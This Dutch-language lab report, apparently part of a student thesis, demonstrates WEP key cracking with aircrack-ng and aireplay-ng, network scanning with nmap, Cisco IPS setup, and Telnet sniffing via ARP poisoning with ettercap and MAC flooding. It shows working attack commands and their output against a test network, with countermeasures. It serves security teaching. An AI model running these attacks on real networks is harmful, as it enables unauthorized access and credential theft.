airodump-ng –channel 1 –write wepdata mon0
Uitleg bij commando:
Je moet de channel waarop je netwerk zich bevindt meegeven. Om achteraf de data te laten analyseren laat je al je frames in een bestand steken dat begint met wepdata. Je geeft de monitor interface 0 mee. Deze monitor interface moet je zelf aanmaken. Dit kan je doen door het volgende commando in te geven: airmon-ng start wlan0.
8.1.2.2 Aircrack-ng Commando om WEP-frames te analyseren: aircrack-ng wepdata01.cap
Nadat je al de frames verzameld hebt, kan je je PCAP bestand door aircrack-ng laten analyseren. Omdat het hier gaat om een testnetwerk en omdat er momenteel geen data over dit netwerk gestuurd worden, is het niet mogelijk om de WEP-key en keystream te kraken.
Resultaat:
Opening wepdata2-01.cap Read 171487 packets. # BSSID ESSID Encryption 1 42:D9:98:60:C3:BC testnetwerk WEP (40226 IVs) Choosing first network as target. Opening wepdata2-01.cap Attack will be restarted every 5000 captured ivs. Starting PTW attack with 40375 ivs. KEY FOUND! [ AF:AF:AF:AF:AF ] Decrypted correctly: 100%
8.2 ARP Replay with Fake authenticaton Bij er ARP replay aanval zullen er data gegenereerd worden op het draadloos netwerk. Deze data zullen dan kunnen geanalyseerd worden. In minder dan vijf minuten kan je op deze manier een WEP-key vinden.
Omdat er bij WEP geen replay detectie is, kan elke frame die ontvangen wordt terug op het netwerk gestuurd worden. Deze teruggestuurde frames zullen weer behandeld worden als nieuwe frames. Een ARP replay aanval zal het verkeer op het netwerk analyseren en zoeken naar broadcast ARP frames. Van deze frames zullen de geadresseerden veranderd worden en dan teruggestuurd worden naar de AP. De AP zal deze frame dan decrypteren, weer encrypteren met een IV en deze frame dan weer uitsturen. Door dit vele malen opnieuw te doen, zal er veel verkeer gegenereerd worden.
De ARP-requests die je stuurt naar de AP moeten komen van een geauthentiseerde client, anders aanvaardt hij de frames niet. Je zal dus eerst een connectie maken met de AP waardoor de AP denkt dat je een betrouwde client bent. Dit kan je doen met airplay-ng.
94
© Nathan Boone
8.2.1 Aanval met de aircrack-ng suite De aircrack-ng suite zal gebruikt worden om deze aanval uit te voeren en hierdoor dan de key te vinden.
8.2.1.1 Monitor mode Voor we beginnen moeten we de adapter in monitor mode plaatsen.
Commando:
airmon-ng start wlan0
Resultaat:
Interface Chipset Driver wlan0 Intel 1030 iwlwifi - [phy0] (monitor mode enabled on mon0)
8.2.1.2 De capture starten Nadat we de adapter in monitor mode plaatsen zullen we de capture starten. Deze laten we doorheen de volgende stappen lopen, zodat we op het einde genoeg data verzameld hebben om te kunnen analyseren met aircrack-ng.
Commando:
airodump-ng --channel 6 --bssid 42:D9:98:60:C3:BC --write wepdata2 mon0
Resultaat:
CH 6 ][ BAT: 2 hours 35 mins ][ Elapsed: 6 mins ][ 2014-01-14 11:22 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 42:D9:98:60:C3:BC -65 100 3705 63920 2 6 54e. WEP WEP OPN testnetwerk BSSID STATION PWR Rate Lost Frames Probe 42:D9:98:60:C3:BC CC:08:E0:20:F8:74 -37 1 -54 2 141614
8.2.1.3 Fake authenticatie Nu onze capture bezig is, openen we een nieuw venster waarin we een fake authenticatie aanval zullen starten. We zullen dit doen door airplay-ng te gebruiken.
Commando:
aireplay-ng --fakeauth 1000 -q 10 -a 42:D9:98:60:C3:BC -h CC:08:E0:20:F8:74 mon0
Resultaat:
The interface MAC (4C:EB:42:94:81:C1) doesn't match the specified MAC (-h). ifconfig mon0 hw ether CC:08:E0:20:F8:74 11:17:44 Waiting for beacon frame (BSSID: 42:D9:98:60:C3:BC) on channel 6 11:17:44 Sending Authentication Request (Open System) [ACK] 11:17:44 Authentication successful 11:17:44 Sending Association Request [ACK] 11:17:44 Association successful :-) (AID: 1) 11:17:54 Sending keep-alive packet [ACK] 11:18:04 Sending keep-alive packet [ACK]
95
© Nathan Boone
8.2.1.4 ARP replay aanval Nadien doen we een ARP-replay aanval om zo verkeer op het netwerk te genereren.
Commando:
aireplay-ng --arpreplay -b 42:D9:98:60:C3:BC -h CC:08:E0:20:F8:74 mon0
Resultaat:
The interface MAC (4C:EB:42:94:81:C1) doesn't match the specified MAC (-h). ifconfig mon0 hw ether CC:08:E0:20:F8:74 11:23:44 Waiting for beacon frame (BSSID: 42:D9:98:60:C3:BC) on channel 6 Saving ARP requests in replay_arp-0114-112344.cap You should also start airodump-ng to capture replies. Read 375 packets (got 124 ARP requests and 70 ACKs), sent 104 packets...(501 ppsRead 513 packets (got 194 ARP requests and 106 ACKs), sent 153 packets...(497 ppRead 640 packets (got 261 ARP requests and 142 ACKs), sent 204 packets...(500 ppRead 802 packets (got 365 ARP requests and 195 ACKs), sent 254 packets...(500 ppRead 968 packets (got 466 ARP requests and 248 ACKs), sent 304 packets...(500 ppRead 1128 packets (got 565 ARP requests and 300 ACKs), sent 354 packets...(500 pRead 1290 packets (got 667 ARP requests and 354 ACKs)
8.2.1.5 Aircrack-ng Tijdens de ARP replay aanval, kunnen we het wepdata.cap bestand laten analyseren door aircrack-ng om achter de WEP-key te komen. Moest dit nog niet lukken, wacht je beter nog even en dan laat je aircrack-ng terug hetzelfde bestand analyseren.
Commando:
aircrack-ng wepdata2-01.cap
Resultaat:
Opening wepdata2-01.cap Read 171487 packets. # BSSID ESSID Encryption 1 42:D9:98:60:C3:BC testnetwerk WEP (40226 IVs) Choosing first network as target. Opening wepdata2-01.cap Attack will be restarted every 5000 captured ivs. Starting PTW attack with 40375 ivs. KEY FOUND! [ AF:AF:AF:AF:AF ] Decrypted correctly: 100%
8.2.2 WEP Hacking Tegenmaatregels Zoals hierboven aangetoond is, heeft WEP zeer veel kwetsbaarheden. Het is dus een
encryptie methode die je het best niet gebruikt op je draadloos netwerk. Als je toch WEP gebruikt, dan kan je evengoed geen encryptie toepassen op je netwerk.
96
© Nathan Boone
Case 1: Scannen en IPS instellen 1 Inleiding Scannen is een belangrijk onderdeel voor een hacker. De hacker zal hiermee kunnen identificeren welke en hoeveel toestellen aanwezig zijn op het netwerk. Hij zal ook te weten komen welke services aanwezig zijn op welke hosts.
2 Topologie Diagram
3 IP-adressen tabel In de volgende tabel vindt u een overzicht van hoe de toestellen verbonden zijn met elkaar en welke IP-adressen ze gekregen hebben.
4 Objectieven • Testnetwerk maken • Netwerk scannen • Intrusion Prevention System instellen • Intrusion Prevention System uittesten
Toestel Interface IP-adres Subnet Mask Default Gateway
Switchport
Internet Serial 0/0/0 10.1.1.2 255.255.255.252 / / Serial 0/0/1 10.2.2.2 255.255.255.252 / /
InternNetwerk Serial 0/0/0 10.1.1.1 255.255.255.252 / / Gigabyte 0/1 192.168.1.1 255.255.255.0 / Switch Intern fa0/1 ExternNetwerk Serial 0/0/1 10.2.2.1 255.255.255.252 / / Gigabyte 0/1 192.168.3.1 255.255.255.0 / Switch Extern fa0/1 NetwerkAdmin NIC 192.168.1.3 255.255.255.0 192.168.1.1 Switch Intern fa0/3 Scanner NIC 192.168.3.3 255.255.255.0 192.168.3.1 Switch Extern fa0/3
97
© Nathan Boone
5 Stappenplan In dit stappenplan zal besproken worden hoe je een netwerk kan opstellen waarin je duidelijk kan zien wat de voordelen zijn van een Intrusion Prevention System. Er zal ook besproken worden hoe en waarom je bepaalde scans uitvoert op het netwerk.
5.1 Stap 1: Testnetwerk opstellen en uittesten In deze stap zal besproken worden hoe je het testnetwerk kan opstellen en daarna kan uittesten. We hebben gewerkt met statische adressering en met OSPF. OSPF zorgt ervoor dat er connectie mogelijk is tussen de verschillende netwerken.
Om het testnetwerk uit te stellen zal er vanaf de router van het extern netwerk een ICMP bericht gestuurd worden naar de router van het interne netwerk, als dit succesvol is, is de configuratie van het testnetwerk geslaagd.
5.1.1 IP-adressen instellen Om de IP-adressen in te stellen op de routers kan je de volgende commando’s gebruiken:
enable conf t hostname R1 interface serial 0/0/0 ip address 10.1.1.1 255.255.255.252 clock rate 64000 no shut interface gig 0/1 ip address 192.168.1.1 255.255.255.0 no shut end copy run start Deze commando’s kan je gebruiken om zo bij elke router de IP-adressen toe te toe te wijzen. Je moet wel de IP-adressen en interfaces veranderen per router.
5.1.2 OSPF instellen Om ervoor te zorgen dat er connectiviteit tussen de afzonderlijke netwerken mogelijk is stellen we OSPF in:
en conf t router ospf 1 network 10.1.1.0 0.0.0.3 area 0 network 192.168.1.0 0.0.0.255 area 0 end copy run start Je zal dit net zoals bij de IP-adressen moeten herhalen bij elke router. Maar dan wel met de andere netwerken.
98
© Nathan Boone
5.1.3 Testnetwerk uittesten Om het testnetwerk uit te testen hebben we ICMP Echo Requests (ping) verstuurd van de router in het externe netwerk naar de router van het interne netwerk. Als er van de router van het interne netwerk ICMP Echo Reply’s terugkomen dan is er connectiviteit.
Commando:
ping 10.1.1.1 Resultaat:
5.2 Stap 2: Netwerk scannen Als hacker zal je proberen om het netwerk te scannen om zo veel gegevens te kunnen vergaren over het netwerk. Enkele verschillende scans die je kan uitvoeren zijn:
• een ARP-scan • een ping-sweep • een TCP poortscan • een Intense scan
5.2.1 ARP-scan Een ARP-scan zal gebruik maken van het ARP-protocol. Bij een ARP-scan zullen er ARP-requests gestuurd worden voor elke host in het netwerk. Al de hosts die aanwezig zijn zullen antwoorden met een ARP-reply. Deze ARP-reply bevat hun MAC-adres.
Commando:
arp-scan 192.168.1.1 Resultaat:
Initiating ARP Ping Scan at 16:10 Scanning 192.168.1.1 [1 port] MAC Address: 44:03:A7:5B:10:81 (Cisco) Completed ARP Ping Scan at 16:10, 0.58s elapsed (1 total hosts)
99
© Nathan Boone
5.2.2 Ping-sweep Met een ping-sweep zal je naar elke host in het netwerk een ping sturen. Dit is een ICMP Echo request. Als je een ICMP Echo reply terugkrijgt dan weet je dat dat toestel aanwezig is op het netwerk.
Commando:
ping 192.168.1.1 Resultaat:
5.2.3 TCP poortscan Met een TCP poortscan zal je een connectie proberen te op te stellen met verschillende poorten op al de toestellen in een netwerk. De poorten die de connectie aanvaarden, dus diegene dat in “listening” state zijn zullen de connectie aanvaarden. Hiermee kan besluiten dat die poorten open staan. Achter elke open poort bevindt zich een service aan het luisteren is.
De poortscan zal uitgevoerd worden met de tool Nmap.
Commando SYN stealth scan:
nmap –sS 192.168.1.1 Resultaat:
Initiating SYN Stealth Scan at 16:10 Scanning 192.168.1.1 [1000 ports] Not shown: 995 closed ports PORT STATE SERVICE 23/tcp open telnet 2002/tcp open telnet 4002/tcp open tcpwrapped 6002/tcp open tcpwrapped 9002/tcp open tcpwrapped MAC Address: 44:03:A7:5B:10:81 (Cisco)Completed SYN Stealth Scan at 16:10, 0.86s elapsed (1000 total ports)
100
© Nathan Boone
5.2.4 Intense scan Om echt alles te weten te komen over een bepaalde host kan je een intense scan uitvoeren. Deze scan heeft zeer veel kans om gelogd te worden door het systeem. Om de reden dat er bij deze scan zeer veel verschillende methodes uitgevoerd worden om te scannen.
Commando:
nmap -T4 -A -v 192.168.1.1 Resultaat:
Starting Nmap 6.40 ( http://nmap.org ) at 2013-12-18 16:10 Romance (standaardtijd) NSE: Loaded 110 scripts for scanning. NSE: Script Pre-scanning. Initiating ARP Ping Scan at 16:10 Scanning 192.168.1.1 [1 port] Completed ARP Ping Scan at 16:10, 0.58s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 16:10 Completed Parallel DNS resolution of 1 host. at 16:10, 16.52s elapsed Initiating SYN Stealth Scan at 16:10 Scanning 192.168.1.1 [1000 ports] Discovered open port 23/tcp on 192.168.1.1 Discovered open port 4002/tcp on 192.168.1.1 Discovered open port 9002/tcp on 192.168.1.1 Discovered open port 2002/tcp on 192.168.1.1 Discovered open port 6002/tcp on 192.168.1.1 Completed SYN Stealth Scan at 16:10, 0.86s elapsed (1000 total ports) Initiating Service scan at 16:10 Scanning 5 services on 192.168.1.1 Completed Service scan at 16:10, 0.02s elapsed (5 services on 1 host) Initiating OS detection (try #1) against 192.168.1.1 NSE: Script scanning 192.168.1.1. Initiating NSE at 16:10 Completed NSE at 16:11, 15.04s elapsed Nmap scan report for 192.168.1.1 Host is up (0.00022s latency). Not shown: 995 closed ports PORT STATE SERVICE 23/tcp open telnet 2002/tcp open telnet 4002/tcp open tcpwrapped 6002/tcp open tcpwrapped 9002/tcp open tcpwrapped MAC Address: 44:03:A7:5B:10:81 (Cisco) OS details: Cisco 836, 890, 1751, 1841, 2800, or 2900 router (IOS 12.4 - 15.1), Cisco Aironet AIR-AP1141N WAP (IOS 12.4) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=262 (Good luck!) IP ID Sequence Generation: Randomized Service Info: OS: IOS; Device: router; CPE: cpe:/o:cisco:ios TRACEROUTE HOP RTT ADDRESS 1 0.22 ms 192.168.1.1 NSE: Script Post-scanning. Read data files from: C:\Program Files (x86)\Nmap
101
© Nathan Boone
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 43.81 seconds Raw packets sent: 1023 (45.806KB) | Rcvd: 1016 (40.938KB)
5.3 Stap 3: Intrusion Prevention System Een Intrusion Prevention System (IPS) is een systeem waarmee je het netwerkverkeer kan monitoren en services mee kan blokkeren als ze door de IPS komen. Een IPS is een toestel waar al het netwerkverkeer door moet vooraleer het verkeer het interne netwerk zal bereiken.
Wij hebben een IPS ingesteld op de router van het interne netwerk.
5.3.1 Intrusion Prevention System instellen Om deze IPS in te stellen hebben we gebruik gemaakt van Cisco Configuration Professional (CCP). CCP is een tool waarmee je vele zaken kan doen, van monitoring tot het instellen van netwerkapparatuur. Wij hebben hiermee een IPS ingesteld.
5.3.1.1 CCP instellen Om CCP te kunnen gebruiken moet je enkele zaken configureren op de toestellen dat je door CCP wilt laten configureren.
Je moet een gebruiker aanmaken met “privilege level 15” en met een wachtwoord. Je moet dan toelaten dat je apparaat kan gevonden worden door CCP, dit doe je met het commando “ip http server”. Wat je ook moet configureren is dat als CCP een connectie wil opstellen met de router dat er een lokale gebruikersnaam en wachtwoord moet ingegeven worden.
Commando’s om CCP te kunnen gebruiken:
en conf t Username <username> privilege <0-15> password 0 <passwoord> Ip http server Ip http authentication local end copy run start Als CCP opgestart is moet je eerst je toestellen laten “discoveren”. Dit is de laatste stap in het proces. Als dit lukt kan je de toestellen via CCP monitoren en aanpassen.
102
© Nathan Boone
5.3.1.2 IPS instellen en Signature aanpassen Als CCP goed opgestart is, ga je naar de tab “Configure” en dan naar de map Security. In deze map staat er Intrusion Prevention. Als je hierop klikt krijg je het volgende scherm.
Figuur 5-1 CCP Intrusion Prevention System
Op dit scherm moet je kiezen voor “Launch IP Role Wizard”, de wizard zal dan starten. Deze wizard zal he helpen om een IPS te configureren.
Figuur 5-2 CCP Intrusion Prevention System
In dit scherm krijg je informatie over al de zaken die je zal moeten beslissen en die je zal moeten invullen bij het instellen van een IPS.
103
© Nathan Boone
Figuur 5-3 CCP Intrusion Prevention System
Hier zal je moeten kiezen op welke interfaces de IPS ingesteld wordt. Je zal ook kiezen of hij moet werken met verkeer dat binnenkomt op die interface of het verkeer dat naar buiten gaat. Door inbound te kiezen bij beide interfaces laat je toe om het verkeer dat van het interne netwerk en van het Internet komt te controleren.
Figuur 5-4 CCP Intrusion Prevention System
104
© Nathan Boone
In het venster van “Signature and Public key” klik je op de drie puntjes naast “signature file”. Een IPS werkt met signatures, deze signatures zullen gebruikt worden om het verkeer na te kijken. Signatures moet je via TFTP op de router plaatsen.
Figuur 5-5 CCP Intrusion Prevention System
Bij “Configure Public Key” zal je de naam en de Public Key zelf moeten ingeven.
Naam: realm-cisco.pub
Pubilc Key:
30820122 300D0609 2A864886 F70D0101 01050003 82010F00 3082010A 02820101 00C19E93 A8AF124A D6CC7A24 5097A975 206BE3A2 06FBA13F 6F12CB5B 4E441F16 17E630D5 C02AC252 912BE27F 37FDD9C8 11FC7AF7 DCDD81D9 43CDABC3 6007D128 B199ABCB D34ED0F9 085FADC1 359C189E F30AF10A C0EFB624 7E0764BF 3E53053E 5B2146A9 D7A5EDE3 0298AF03 DED7A5B8 9479039D 20F30663 9AC64B93 C0112A35 FE3F0C87 89BCB7BB 994AE74C FA9E481D F65875D6 85EAF974 6D9CC8E3 F0B08B85 50437722 FFBE85B9 5E4189FF CC189CB9 69C46F9C A84DFBA5 7A0AF99E AD768C36 006CF498 079F88F8 A3B3FB1F 9FB7B3CB 5539E1D1 9693CCBB 551F78D2 892356AE 2F56D826 8918EF3C 80CA4F4D 87BFCA3B BFF668E9 689782A5 CF31CB6E B4B094D3 F3020301 0001
105
© Nathan Boone
Figuur 5-6 CCP Intrusion Prevention System
In het volgende scherm klik je op de drie puntjes die naast “Config Location” staan. Dan krijg je dit scherm. In dit scherm zal je beslissen op welke plaats op de router je de signature wil opslaan.
Figuur 5-7 CCP Intrusion Prevention System
Bij “Chose Category” kies je voor “basic”, we kiezen hiervoor omdat we de IPS minder lang duurt om te implementeren en het vergt minder CPU gebruik en flash memory van de router.
106
© Nathan Boone
Figuur 5-8 CCP Intrusion Prevention System
Als volgt krijg je een overzicht van al de commando’s die je anders manueel zou moeten toepassen op de router.
Figuur 5-9 CCP Intrusion Prevention System
In dit overzicht kan je zien op welke interface in welke richting de IPS geactiveerd is.
107
© Nathan Boone
Figuur 5-10 CCP Intrusion Prevention System
Dit is een overzicht van de beschikbare signatures. Zoals je kan zien zijn er al signatures die automatisch aanstaan en enkele die nog niet aan staan.
Figuur 5-11 CCP Intrusion Prevention System
We zullen een nieuwe signature definiëren en die dan uittesten. We zullen de signature toepassen die ICMP Echo Requests zal kunnen identificeren.
108
© Nathan Boone
Figuur 5-12 CCP Intrusion Prevention System
We hebben deze signature aangezet en als volgt hebben we met de rechtermuisklik geklikt op de signature. In dat menu dat verschijnt kies je voor “Actions…”.
Figuur 5-13 CCP Intrusion Prevention System
Bij actions kan je kiezen wat er gebeurt als er aan de signature voldaan wordt.
Wij hebben ervoor gekozen om de aanvaller tegen te houden, een alert te produceren en de TCP connectie te resetten. Hierdoor zal de ICMP Echo Request tegengehouden worden door de IPS.
109
© Nathan Boone
Figuur 5-14 CCP Intrusion Prevention System
Als al het vorige gedaan is klik je op “Apply Changes”, normaal zou er nu bij “Enabled” een vinkje moeten staat. Hiermee weet je dat je je signature goed ingesteld hebt.
5.3.1.3 Logging van de IPS instellen Als je je signature configureert kan je kiezen om een alert te genereren. Je kan ook configureren dat die alert naar je computer wordt gestuurd.
Om logging in te stellen ga je naar de Configure tab. Dan ga je naar router en als volgt kies je voor logging. Je zou een scherm moeten krijgen als deze:
Figuur 5-15 CCP Intrusion Prevention System
110
© Nathan Boone
Hierbij zal je kiezen om de logberichten door te sturen naar de computer met het IP-adres 192.168.1.1. En dit van al de berichten tot op het niveau van debugging. In een echte omgeving wordt die meestal niet gedaan, omdat het dan echt wel veel berichten zijn, die naar je computer gestuurd worden. Dit zorgt voor extra belasting in het netwerk.
5.3.1.4 IPS uittesten Als laatste zullen we de IPS uittesten en zien of deze de ICMP Requests tegen houdt. Dit zullen we doen door de router waar de IPS op geïnstalleerd staat te pingen.
Commando:
ping 192.168.1.1 Resultaat:
In CCP kan je enkele statistieken nagaan dat je meer uitleg geven over hoe de IPS functioneert.
Figuur 5-16 CCP Intrusion Prevention System
Zoals te zien is zijn er 8 ICMP Echo requests doorgestuurd naar de IPS. Je kan zien dat de “source IP Address” 192.168.3.3:8 is, dit is omdat een Echo-request verstuurd wordt op ICMP poort 8 en toekomt op ICMP poort 0.
Hierna hebben we met Nmap een intense scan uitgevoerd om na te gaan dat dit nog andere signatures zou triggeren.
111
© Nathan Boone
Figuur 5-17 CCP Intrusion Prevention System
Zoals te zien is, zijn er door de Intense Nmap scan ook de signatures voor een TCP SYN/FIN pakket en TCP NULL pakket getriggerd. Omdat er hiervoor enkel het event “procedure-alert” gekozen is zal dit pakket wel doorgelaten worden maar er zal wel een alert gegenereerd worden.
6 Conclusie Er zijn vele verschillende soorten scannen beschikbaar die je in een netwerk kan uitvoeren. Om ervoor te zorgen dat deze scans geen resultaat opleveren kan je als netwerkbeheerder een IPS instellen. Met deze IPS kan je dus al het verkeer filteren en dus ook al het slechte verkeer er uit halen.
Er zijn wel enkele zaken waar je rekening moet mee houden. Er zijn applicaties die ICMP Echo requests nodig hebben om te kunnen functioneren. Dus vooraleer je een IPS instelt moet je nagaan welke noden er zijn in je netwerk en dan een gulden middenweg kiezen tussen de beveiliging en de functionaliteit.
112
© Nathan Boone
Case 2: Netwerkverkeer afluisteren 1 Inleiding In veel bedrijven heb je de mogelijkheid om je laptop mee te nemen in een vergaderzaal. Als je dan even alleen gelaten wordt en er is niemand die let op jou, zou je kunnen binnenbreken in de netwerktoestellen door netwerkverkeer af te luisteren. Welbepaald het Telnet protocol.
Telnet is een protocol dat je als netwerkadministrator beter niet gebruikt omdat, alles wat je intypt in je Telnet-sessie in niet geëncrypteerd tekst doorstuurt. Je zou als hacker dus alles kunnen lezen wat er getypt wordt, als je de verbinding afluistert. De pakketten zullen wel enkel te zien zijn op het toestel dat de pakketten verstuurd en op het toestel dat de pakketten ontvangt. Als jij de pakketten toch wilt kunnen ontvangen kan je twee zaken doen:
• MAC table flooding • ARP poisoning
Deze twee manieren zullen verder in deze case besproken worden.
2 Topologie Diagram De topologie die hieronder volgt is een logische topologie zoals die in een echt netwerk kan zijn. De HoofdRouter is verbonden met de HoofdSwitch. Waarna de HoofdSwitch in verbinding zal staan met de afzonderlijke switches waar dan de toestellen aan verbonden zijn.
Figuur 2-1 Logische topologie
113
© Nathan Boone
3 IP Adressen Tabel In de volgende tabel vindt u een overzicht van hoe de toestellen verbonden zijn met elkaar en welke IP-adressen ze gekregen hebben. De HoofdRouter is een DHCP server.
Uitleg bij de afkortingen:
• VS: VergaderzaalSwitch • HS: HoofdSwitch • AS: AdministratorSwitch • NA: NetwerkAdministrator
Toestel Interface IP-adres Subnet Mask Default Gateway
Switchport
HoofdRouter Gig0/0 Aangeleerd via DHCP Gig0/1 192.168.1.1 255.255.255.0 / HS Gig0/1
Hoofdswitch / / / / / VS / / / / HS fa0/1 AS / / / / HS fa0/2 Hacker NIC DHCP
192.168.1.3 255.255.255.0 192.168.1.1 VS fa0/1
NA NIC DHCP 192.168.1.2
255.255.255.0 192.168.1.1 AS fa/01
4 Objectieven • Testnetwerk maken • Netwerk scannen • ARP poisoning toepassen en Telnet pakketten afluisteren • MAC table flooding toepassen en Telnet pakketten afluisteren
5 Stappenplan In dit stappenplan zal besproken worden hoe je het netwerk kan opstellen waar de aanval op uitgevoerd word. Er zal ook besproken worden hoe je ARP poisoning kan toepassen en hierdoor de Telnet pakketten kan afluisteren. Als laatste zal MAC table flooding uitgelegd worden en hoe dit je kan helpen om de Telnet pakketten kan afluisteren.
5.1 Stap 1: Testnetwerk opstellen en uittesten Om het testnetwerk op te stellen zal je een DHCP server moeten configureren en IP-adressen instellen op de HoofdRouter. Je zal ook een default-route moeten instellen op de HoofdRouter zodat al de pakketten die de HoofdRouter ontvangt en die niet bestemd zijn voor de HoofdRouter zelf, doorgestuurd worden naar hun bestemming op het internet.
Om het testnetwerk uit te testen kan je een ping naar de HoofdRouter uitvoeren van één van de toestellen die via DHCP een IP-adres zouden moeten krijgen.
114
© Nathan Boone
5.1.1 IP-adressen en een default-route instellen op de HoofdRouter Om ervoor te zorgen dat de HoofdRouter kan gebruikt worden om te beheren via Telnet zal je een IP-adres moeten instellen op de HoofdRouter. Je zal hiervoor ook een console, enable en Telnet wachtwoord moeten instellen.
Commando’s om een IP-adres in te stellen:
enable conf t hostname R1 interface gig 0/0 ip address dhcp no shutdown interface gig 0/1 ip address 192.168.1.1 255.255.255.0 no shutdown end copy run start Commando’s om een console, enable en Telnet wachtwoord in te stellen:
enable conf t enable secret cisco123 line console 0 password ciscoconpass exit line vty 0 4 password cisco exec-timeout 0 5 end copy run start Commando’s om een default route in te stellen:
enable conf t ip route 0.0.0.0 0.0.0.0 gig 0/0 end copy run start
5.1.2 DHCP server configureren Een DHCP server is een server die IP-adressen zal toewijzen aan de toestellen die in je netwerk aanwezig zijn.
Commando’s om een DHCP server in te stellen:
enable conf t ip dhcp pool DHCP network 192.168.1.0 default-router 192.168.1.1 exit ip dhcp excluded-address 192.168.1.1 end copy run start
115
© Nathan Boone
5.1.3 Testnetwerk uittesten Om na te gaan dat je DHCP server werkt kan je op de HoofdRouter het commando sh ip dhcp binding uitvoeren, dit commando zal je laten zijn hoeveel en aan wie hij IP-adressen uitgedeeld heeft. Om het testnetwerk uit te testen kan je eerst nakijken of je een IP-adres gekregen hebt van de DHCP server. Als volgt kan je een ping uitvoeren naar de HoofdRouter om na te gaan dat je connectie hebt met de HoofdRouter.
Commando op de HoofdRouter om na te gaan aan wie hij welke IP-adressen heeft uitgedeeld:
sh ip dhcp binding Resultaat:
Figuur 5-1 Commando sh ip dhcp binding
Commando om na te gaan dat je een IP-adres gekregen hebt:
ipconfig Resultaat:
Figuur 5-2 Commando ipconfig
Commando om na te gaan dat je connectie hebt met de HoofdRouter:
ping 192.168.1.1 Resultaat:
Figuur 5-3 Commando ping 192.168.1.1
Als dit allemaal in orde is, kunnen we overgaan naar stap 2. Als dit niet in orde is moet je je configuratie op de HoofdRouter nakijken met het commando show running config.
116
© Nathan Boone
5.2 Stap 2: Netwerk scannen Als je je connecteert met het netwerk en je wil weten op welke apparaten er Telnet aanstaat, dus op welk toestel Telnet geconfigureerd staat, kan je een poortscan uitvoeren. Deze poortscan kan je uitvoeren met Nmap. Meer informatie over poortscans kan je terugvinden in de bijlage Scanning.
Als je het resultaat van de poortscan analyseert kan je hieruit afleiden dat er zich een router bevindt achter het IP-adres 192.168.1.1, op deze router is poort 23 open. Dit is de poort dat Telnet gebruikt voor de communicatie. Achter het IP-adres 192.168.1.2 bevindt zich een Dell computer. Het IP-adres 192.168.1.3 is je eigen computer.
Commando om een poortscan uit te voeren met Nmap:
nmap –sS 192.168.1.0/24 Resultaat:
Starting Nmap 6.40 ( http://nmap.org ) at 2013-12-21 14:12 Romance Standard Time Nmap scan report for 192.168.1.1 Host is up (0.021s latency). Not shown: 994 closed ports PORT STATE SERVICE 23/tcp open telnet 80/tcp open http 443/tcp open https 992/tcp open telnets 8080/tcp open http-proxy 8443/tcp open https-alt MAC Address: 7C:03:D8:C2:31:B8 (unknwown) Nmap scan report for 192.168.1.2 Host is up (0.0060s latency). All 1000 scanned ports on 192.168.1.2 are closed MAC Address: 24:B6:FD:4E:6F:BF (Dell) Nmap scan report for 192.168.1.3 Host is up (0.0060s latency). All 1000 scanned ports on 192.168.1.3 are closed MAC Address: B8:27:EB:3C:05:97 (unknown) Nmap done: 256 IP addresses (6 hosts up) scanned in 36.97 seconds
117
© Nathan Boone
5.3 Stap 3: ARP poisoning toepassen en Telnet verkeer afluisteren De pakketten die via Telnet verstuurd worden kunnen enkel gezien worden op de computer die de pakketten verzendt en het toestel die ze ontvangt. In dit geval is het de NetwerkAdministrator die de pakketten zal versturen en de HoofdRouter die ze zal ontvangen. Door ARP poisoning toe te passen kan je al het verkeer dat van de NetwerkAdministrator naar de HoofdRouter stuurt, omleiden via uw eigen toestel. Hierdoor kan je de pakketten van Telnet afluisteren.
5.3.1 ARP Poisoning Bij ARP poisoning gebruik je het ARP protocol om op die manier al de gegevens via jouw toestel om te leiden. Dit gebeurt in 3 stappen.
• Eerst zal je een ARP reply sturen naar de router om zo de router te doen geloven dat jij de netwerkadministrator bent.
• Ten tweede stuur je een ARP reply naar de computer van de netwerkadministrator om aan zijn computer te laten geloven dat jij de router bent.
• Als laatste maak je gebruik van IP forwarding. Hierdoor zal al het verkeer dat voorbij je toestel passeert naar de router doorgestuurd worden, waardoor de netwerk administrator niet weet dat er afgeluisterd wordt.
Figuur 5-4 ARP-poisoning
bron: http://www.watchguard.com/infocenter/editorial/135324.asp, http://www.watchguard.com/archive/files/images/ARPpoison3.jpg
118
© Nathan Boone
5.3.2 ARP Poisoning met Ettercap Om de ARP poison aanval uit te voeren kan je de tool Ettercap gebruiken. Dit is een tool die je toelaat om aan ARP poisoning te doen en daarna de netwerkverbinding af te luisteren. Ettercap laat ook toe om daarna de verbinding tussen de netwerk administrator en de hoofdrouter te herstellen.
Commando om ettercap te starten: ettercap –T –M arp:remote /192.168.1.1/ /192.168.1.2/
Resultaat:
Figuur 5-5 Opstarten van ettercap
Hierna zullen de pakketten die van de netwerk administrator naar de hoofdrouter gaan en omgekeerd beginnen te verschijnen. Door de volgende stroom van pakketten te analyseren kan je afleiden dat het enable wachtwoord cisco123 is. Dit kan je weten omdat er “Password:” staat en eens dat ingegeven is staat er “R#” wat wil zeggen dat het enable wachtwoord de juiste is.
119
© Nathan Boone
Figuur 5-6 Pakketten vergreken met ettercap
120
© Nathan Boone
5.4 Stap 4: MAC table flooding MAC table flooding is een andere manier om al het netwerkverkeer af te luisteren. Door MAC table flooding toe te passen zorg je ervoor dat een switch zal opereren als een HUB waardoor deze al de pakketten die hij ontvangt zal broadcasten over het netwerk.
Een switch weet aan de hand van het MAC-adres naar waar hij de pakketten moet sturen. Een switch zal al de aangeleerde MAC-adressen bijhouden in een MAC-table. Als hacker zal je proberen deze MAC-table vol te steken met MAC-adressen waardoor de switch al de pakketten die hij ontvangt zal broadcasten op al de poorten. Hierdoor ontvang je als hacker ook het gewenste Telnet verkeer.
We hebben dit uitgetest op een 2960 cisco switch en dit is niet gelukt omdat deze switch niet toelaat dat zijn MAC-table helemaal vol loopt. Hij zal altijd 40 adressen overhouden en hij zal geen nieuwe adressen meer aanleren.
Het commando macof zal heel rap honderden mac-adressen doorsturen naar de switch.
Commando voor MAC-adressen in switch te steken:
macof Resultaat:
121
© Nathan Boone
6 Tegenmaatregel tegen afluisteren van het netwerk Er zijn drie maatregelen die je kan nemen om ervoor te zorgen dat de methodes van hiervoor niet uitgevoerd kunnen worden.
